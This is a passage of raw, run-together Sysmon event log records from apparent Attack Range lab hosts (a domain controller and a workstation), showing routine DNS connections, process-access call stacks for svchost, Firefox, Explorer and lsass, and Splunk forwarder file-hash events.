12:24:59.499{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-932.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal65453- 354300x8000000000000000441371Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:58.561{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62421-false10.0.1.12-8000- 10341000x8000000000000000441370Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:02.229{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441369Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:02.229{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441368Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:02.051{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=418FC8C24B6D73A73D82147EB064F2C6,SHA256=0FC566D98C6F70D6614B16792C40AF548D72F42E35B71B62A92BC6BF0E64B7BF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292772Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:02.098{BEA10069-276A-6087-1610-00000000BB01}26406024C:\Program Files\Mozilla Firefox\firefox.exe{BEA10069-276C-6087-1810-00000000BB01}5476C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3f4e31|C:\Program Files\Mozilla Firefox\xul.dll+11f80f1|C:\Program Files\Mozilla Firefox\xul.dll+1229bc9|C:\Program Files\Mozilla Firefox\xul.dll+1229ae9|C:\Program Files\Mozilla Firefox\xul.dll+12271ed|C:\Program Files\Mozilla Firefox\xul.dll+1227694|C:\Program Files\Mozilla Firefox\xul.dll+16cb5a1|C:\Program Files\Mozilla Firefox\xul.dll+16cc602|C:\Program Files\Mozilla Firefox\xul.dll+16b0353|C:\Program Files\Mozilla Firefox\xul.dll+17ae7c2|C:\Program Files\Mozilla Firefox\xul.dll+17ae5c4|C:\Program Files\Mozilla Firefox\xul.dll+685ec7|C:\Program Files\Mozilla Firefox\xul.dll+17aba54|C:\Program Files\Mozilla Firefox\xul.dll+17b53ad|C:\Program Files\Mozilla Firefox\xul.dll+17b53ad|C:\Program Files\Mozilla Firefox\xul.dll+17b53ad|C:\Program Files\Mozilla Firefox\xul.dll+17a9948|C:\Program Files\Mozilla Firefox\xul.dll+17a9d9f|C:\Program Files\Mozilla Firefox\xul.dll+6765ed|C:\Program Files\Mozilla Firefox\xul.dll+64dedc|C:\Program Files\Mozilla Firefox\xul.dll+644b48|C:\Program Files\Mozilla Firefox\xul.dll+2c29de1 10341000x8000000000000000292771Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:02.098{BEA10069-276A-6087-1610-00000000BB01}26406024C:\Program Files\Mozilla Firefox\firefox.exe{BEA10069-276C-6087-1810-00000000BB01}5476C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3f4e31|C:\Program Files\Mozilla Firefox\xul.dll+120830e|C:\Program Files\Mozilla Firefox\xul.dll+16b16fc|C:\Program Files\Mozilla Firefox\xul.dll+68869b|C:\Program Files\Mozilla Firefox\xul.dll+17ae692|C:\Program Files\Mozilla Firefox\xul.dll+17ae5c4|C:\Program Files\Mozilla Firefox\xul.dll+685ec7|C:\Program Files\Mozilla Firefox\xul.dll+17aba54|C:\Program Files\Mozilla Firefox\xul.dll+17b53ad|C:\Program Files\Mozilla Firefox\xul.dll+17b53ad|C:\Program Files\Mozilla Firefox\xul.dll+17b53ad|C:\Program Files\Mozilla Firefox\xul.dll+17a9948|C:\Program Files\Mozilla Firefox\xul.dll+17a9d9f|C:\Program Files\Mozilla Firefox\xul.dll+6765ed|C:\Program Files\Mozilla Firefox\xul.dll+64dedc|C:\Program Files\Mozilla Firefox\xul.dll+644b48|C:\Program Files\Mozilla Firefox\xul.dll+2c29de1|C:\Program Files\Mozilla Firefox\xul.dll+2c29190|C:\Program Files\Mozilla Firefox\xul.dll+623991|C:\Program Files\Mozilla Firefox\xul.dll+2ddeebe|C:\Program Files\Mozilla Firefox\xul.dll+2de3ec0|C:\Program Files\Mozilla Firefox\xul.dll+2de3d21 10341000x8000000000000000292770Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:02.098{BEA10069-276A-6087-1610-00000000BB01}26406024C:\Program Files\Mozilla Firefox\firefox.exe{BEA10069-276C-6087-1810-00000000BB01}5476C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3f4e31|C:\Program Files\Mozilla Firefox\xul.dll+11f80f1|C:\Program Files\Mozilla Firefox\xul.dll+1229bc9|C:\Program Files\Mozilla Firefox\xul.dll+1229ae9|C:\Program Files\Mozilla Firefox\xul.dll+12271ed|C:\Program Files\Mozilla Firefox\xul.dll+1227694|C:\Program Files\Mozilla Firefox\xul.dll+16cb5a1|C:\Program Files\Mozilla Firefox\xul.dll+687059|C:\Program Files\Mozilla Firefox\xul.dll+686f64|C:\Program Files\Mozilla Firefox\xul.dll+686d4d|C:\Program Files\Mozilla Firefox\xul.dll+686984|C:\Program Files\Mozilla Firefox\xul.dll+17ae673|C:\Program Files\Mozilla Firefox\xul.dll+17ae5c4|C:\Program Files\Mozilla Firefox\xul.dll+685ec7|C:\Program Files\Mozilla Firefox\xul.dll+17aba54|C:\Program Files\Mozilla Firefox\xul.dll+17b53ad|C:\Program Files\Mozilla Firefox\xul.dll+17b53ad|C:\Program Files\Mozilla Firefox\xul.dll+17b53ad|C:\Program Files\Mozilla Firefox\xul.dll+17a9948|C:\Program Files\Mozilla Firefox\xul.dll+17a9d9f|C:\Program Files\Mozilla Firefox\xul.dll+6765ed|C:\Program Files\Mozilla Firefox\xul.dll+64dedc 10341000x8000000000000000292769Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:02.098{BEA10069-276A-6087-1610-00000000BB01}26406024C:\Program Files\Mozilla Firefox\firefox.exe{BEA10069-276C-6087-1810-00000000BB01}5476C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3f4e31|C:\Program Files\Mozilla Firefox\xul.dll+11f80f1|C:\Program Files\Mozilla Firefox\xul.dll+1229bc9|C:\Program Files\Mozilla Firefox\xul.dll+1229ae9|C:\Program Files\Mozilla Firefox\xul.dll+12271ed|C:\Program Files\Mozilla Firefox\xul.dll+1227694|C:\Program Files\Mozilla Firefox\xul.dll+16cb5a1|C:\Program Files\Mozilla Firefox\xul.dll+16cc602|C:\Program Files\Mozilla Firefox\xul.dll+16b0353|C:\Program Files\Mozilla Firefox\xul.dll+17ae7c2|C:\Program Files\Mozilla Firefox\xul.dll+17ae5c4|C:\Program Files\Mozilla Firefox\xul.dll+685ec7|C:\Program Files\Mozilla Firefox\xul.dll+17aba54|C:\Program Files\Mozilla Firefox\xul.dll+17b53ad|C:\Program Files\Mozilla Firefox\xul.dll+17b53ad|C:\Program Files\Mozilla Firefox\xul.dll+17b53ad|C:\Program Files\Mozilla Firefox\xul.dll+17a9948|C:\Program Files\Mozilla Firefox\xul.dll+17a9d9f|C:\Program Files\Mozilla Firefox\xul.dll+6765ed|C:\Program Files\Mozilla Firefox\xul.dll+64dedc|C:\Program Files\Mozilla Firefox\xul.dll+644b48|C:\Program Files\Mozilla Firefox\xul.dll+2c29de1 10341000x8000000000000000292768Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:02.098{BEA10069-276A-6087-1610-00000000BB01}26406024C:\Program Files\Mozilla Firefox\firefox.exe{BEA10069-276C-6087-1810-00000000BB01}5476C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3f4e31|C:\Program Files\Mozilla Firefox\xul.dll+120830e|C:\Program Files\Mozilla Firefox\xul.dll+16b16fc|C:\Program Files\Mozilla Firefox\xul.dll+68869b|C:\Program Files\Mozilla Firefox\xul.dll+17ae692|C:\Program Files\Mozilla Firefox\xul.dll+17ae5c4|C:\Program Files\Mozilla Firefox\xul.dll+685ec7|C:\Program Files\Mozilla Firefox\xul.dll+17aba54|C:\Program Files\Mozilla Firefox\xul.dll+17b53ad|C:\Program Files\Mozilla Firefox\xul.dll+17b53ad|C:\Program Files\Mozilla Firefox\xul.dll+17b53ad|C:\Program Files\Mozilla Firefox\xul.dll+17a9948|C:\Program Files\Mozilla Firefox\xul.dll+17a9d9f|C:\Program Files\Mozilla Firefox\xul.dll+6765ed|C:\Program Files\Mozilla Firefox\xul.dll+64dedc|C:\Program Files\Mozilla Firefox\xul.dll+644b48|C:\Program Files\Mozilla Firefox\xul.dll+2c29de1|C:\Program Files\Mozilla Firefox\xul.dll+2c29190|C:\Program Files\Mozilla Firefox\xul.dll+623991|C:\Program Files\Mozilla Firefox\xul.dll+2ddeebe|C:\Program Files\Mozilla Firefox\xul.dll+2de3ec0|C:\Program Files\Mozilla Firefox\xul.dll+2de3d21 10341000x8000000000000000292767Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:02.098{BEA10069-276A-6087-1610-00000000BB01}26406024C:\Program Files\Mozilla Firefox\firefox.exe{BEA10069-276C-6087-1810-00000000BB01}5476C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3f4e31|C:\Program Files\Mozilla Firefox\xul.dll+11f80f1|C:\Program Files\Mozilla Firefox\xul.dll+1229bc9|C:\Program Files\Mozilla Firefox\xul.dll+1229ae9|C:\Program Files\Mozilla Firefox\xul.dll+12271ed|C:\Program Files\Mozilla Firefox\xul.dll+1227694|C:\Program Files\Mozilla Firefox\xul.dll+16cb5a1|C:\Program Files\Mozilla Firefox\xul.dll+687059|C:\Program Files\Mozilla Firefox\xul.dll+686f64|C:\Program Files\Mozilla Firefox\xul.dll+686d4d|C:\Program Files\Mozilla Firefox\xul.dll+686984|C:\Program Files\Mozilla Firefox\xul.dll+17ae673|C:\Program Files\Mozilla Firefox\xul.dll+17ae5c4|C:\Program Files\Mozilla Firefox\xul.dll+685ec7|C:\Program Files\Mozilla Firefox\xul.dll+17aba54|C:\Program Files\Mozilla Firefox\xul.dll+17b53ad|C:\Program Files\Mozilla Firefox\xul.dll+17b53ad|C:\Program Files\Mozilla Firefox\xul.dll+17b53ad|C:\Program Files\Mozilla Firefox\xul.dll+17a9948|C:\Program Files\Mozilla Firefox\xul.dll+17a9d9f|C:\Program Files\Mozilla Firefox\xul.dll+6765ed|C:\Program Files\Mozilla Firefox\xul.dll+64dedc 10341000x8000000000000000292766Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:02.098{BEA10069-276A-6087-1610-00000000BB01}26406024C:\Program Files\Mozilla Firefox\firefox.exe{BEA10069-276C-6087-1810-00000000BB01}5476C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3f4e31|C:\Program Files\Mozilla Firefox\xul.dll+11f80f1|C:\Program Files\Mozilla Firefox\xul.dll+1229bc9|C:\Program Files\Mozilla Firefox\xul.dll+1229ae9|C:\Program Files\Mozilla Firefox\xul.dll+12271ed|C:\Program Files\Mozilla Firefox\xul.dll+1227694|C:\Program Files\Mozilla Firefox\xul.dll+16cb5a1|C:\Program Files\Mozilla Firefox\xul.dll+687059|C:\Program Files\Mozilla Firefox\xul.dll+686f64|C:\Program Files\Mozilla Firefox\xul.dll+686d4d|C:\Program Files\Mozilla Firefox\xul.dll+686984|C:\Program Files\Mozilla Firefox\xul.dll+3020711|C:\Program Files\Mozilla Firefox\xul.dll+3020219|C:\Program Files\Mozilla Firefox\xul.dll+3023f17|C:\Program Files\Mozilla Firefox\xul.dll+302608f|C:\Program Files\Mozilla Firefox\xul.dll+676346|C:\Program Files\Mozilla Firefox\xul.dll+64dedc|C:\Program Files\Mozilla Firefox\xul.dll+644b48|C:\Program Files\Mozilla Firefox\xul.dll+2c29de1|C:\Program Files\Mozilla Firefox\xul.dll+2c29190|C:\Program Files\Mozilla Firefox\xul.dll+623991|C:\Program Files\Mozilla Firefox\xul.dll+2ddeebe 10341000x8000000000000000292765Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:02.098{BEA10069-276A-6087-1610-00000000BB01}26406024C:\Program Files\Mozilla Firefox\firefox.exe{BEA10069-276C-6087-1810-00000000BB01}5476C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3f4e31|C:\Program Files\Mozilla Firefox\xul.dll+11f80f1|C:\Program Files\Mozilla Firefox\xul.dll+1229bc9|C:\Program Files\Mozilla Firefox\xul.dll+1229ae9|C:\Program Files\Mozilla Firefox\xul.dll+12271ed|C:\Program Files\Mozilla Firefox\xul.dll+1227694|C:\Program Files\Mozilla Firefox\xul.dll+16cb5a1|C:\Program Files\Mozilla Firefox\xul.dll+687059|C:\Program Files\Mozilla Firefox\xul.dll+686f64|C:\Program Files\Mozilla Firefox\xul.dll+686d4d|C:\Program Files\Mozilla Firefox\xul.dll+686984|C:\Program Files\Mozilla Firefox\xul.dll+3020711|C:\Program Files\Mozilla Firefox\xul.dll+3020219|C:\Program Files\Mozilla Firefox\xul.dll+3023f17|C:\Program Files\Mozilla Firefox\xul.dll+302608f|C:\Program Files\Mozilla Firefox\xul.dll+676346|C:\Program Files\Mozilla Firefox\xul.dll+64dedc|C:\Program Files\Mozilla Firefox\xul.dll+644b48|C:\Program Files\Mozilla Firefox\xul.dll+2c29de1|C:\Program Files\Mozilla Firefox\xul.dll+2c29190|C:\Program Files\Mozilla Firefox\xul.dll+623991|C:\Program Files\Mozilla Firefox\xul.dll+2ddeebe 10341000x8000000000000000292764Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:02.076{BEA10069-276A-6087-1610-00000000BB01}26406024C:\Program Files\Mozilla Firefox\firefox.exe{BEA10069-276C-6087-1910-00000000BB01}3764C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+50791|C:\Program Files\Mozilla Firefox\xul.dll+2a6459c|C:\Program Files\Mozilla Firefox\xul.dll+2a64067|C:\Program Files\Mozilla Firefox\xul.dll+d96969|C:\Program Files\Mozilla Firefox\xul.dll+d8eb60|C:\Program Files\Mozilla Firefox\xul.dll+40981|C:\Program Files\Mozilla Firefox\xul.dll+1225bfe|C:\Program Files\Mozilla Firefox\xul.dll+11fdc4f|C:\Program Files\Mozilla Firefox\xul.dll+3fd3e|C:\Program Files\Mozilla Firefox\xul.dll+3cee48|C:\Program Files\Mozilla Firefox\xul.dll+3cdbbf|C:\Program Files\Mozilla Firefox\xul.dll+3a1f28a|C:\Program Files\Mozilla Firefox\xul.dll+3abc2df|C:\Program Files\Mozilla Firefox\xul.dll+3abd659|C:\Program Files\Mozilla Firefox\xul.dll+3f23|C:\Program Files\Mozilla Firefox\firefox.exe+1594|C:\Program Files\Mozilla Firefox\firefox.exe+4c4a8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292763Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:02.060{BEA10069-D4AF-6086-5601-00000000BB01}4365064C:\Windows\Explorer.EXE{BEA10069-276A-6087-1610-00000000BB01}2640C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62e17|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bd9f|C:\Windows\System32\windows.storage.dll+13ab2b|C:\Windows\System32\windows.storage.dll+13904f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292762Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:02.044{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-276A-6087-1610-00000000BB01}2640C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+618a4|C:\Windows\System32\SHELL32.dll+62840|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292761Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:02.044{BEA10069-D4AF-6086-5601-00000000BB01}4364948C:\Windows\Explorer.EXE{BEA10069-276A-6087-1610-00000000BB01}2640C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292760Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:02.044{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E02F0654182E27579249B1081A1502F7,SHA256=B2A403D01ADAEFF5FDAAE473D840AD9877445A510E9E0C96DCA710424E14CDA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441378Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:03.614{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B02718537C2033F2466FFC54696FE4B1,SHA256=128F32C3B336F9AA2935B1106B3290C72147FB0E9BAE46F4001CB9D4C1367142,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292777Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:03.563{BEA10069-276A-6087-1610-00000000BB01}2640WIN-HOST-96\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zh9k90mg.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=4268101D1E1912EDC014F86C38BBB7EE,SHA256=9C8C1E1F2FB44ECF8B1B5164D5F211B837D23404EF01C70EAC0AC67716244820,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292776Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:03.281{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC2C22993553FE04DCEE5DCE02CF4496,SHA256=90D7E2940C18B20B71B9895F4C8DA123C41A959FE6678AA4727D4C9652A68E8B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000441377Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:00.531{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-932.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal59900- 10341000x8000000000000000441376Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:03.230{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441375Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:03.230{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441374Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:03.106{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D00C2E2D0C59CC55D7DE06B1025E3420,SHA256=ECE1E9310F14171E1831147B7C433241C5242317F19A9F947A8618320321855F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292775Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:03.080{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=94B306E79ABFCBFCC609272958A25267,SHA256=9C8582F2453663937AF6A6E166529C1BEFBD0BE03459213F470A9B70305DEE46,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292780Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:04.786{BEA10069-D0C1-6086-0B00-00000000BB01}6407044C:\Windows\system32\lsass.exe{BEA10069-D0B7-6086-0100-00000000BB01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x8000000000000000292779Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:25:04.302{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC8CFA5D5DFF5059CCFE98FBBABF7FD8,SHA256=316A47D96A993FD09E7D83C4EEB918158AAD491E05C530A74186557B67ACA0E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441381Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:04.622{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14D05F646F38424115797B3D702D5390,SHA256=6602CD2480FA700D03ECC92892FDA397D1C56D08A004019658769782DABE1E52,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441380Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:25:04.231{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441379Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 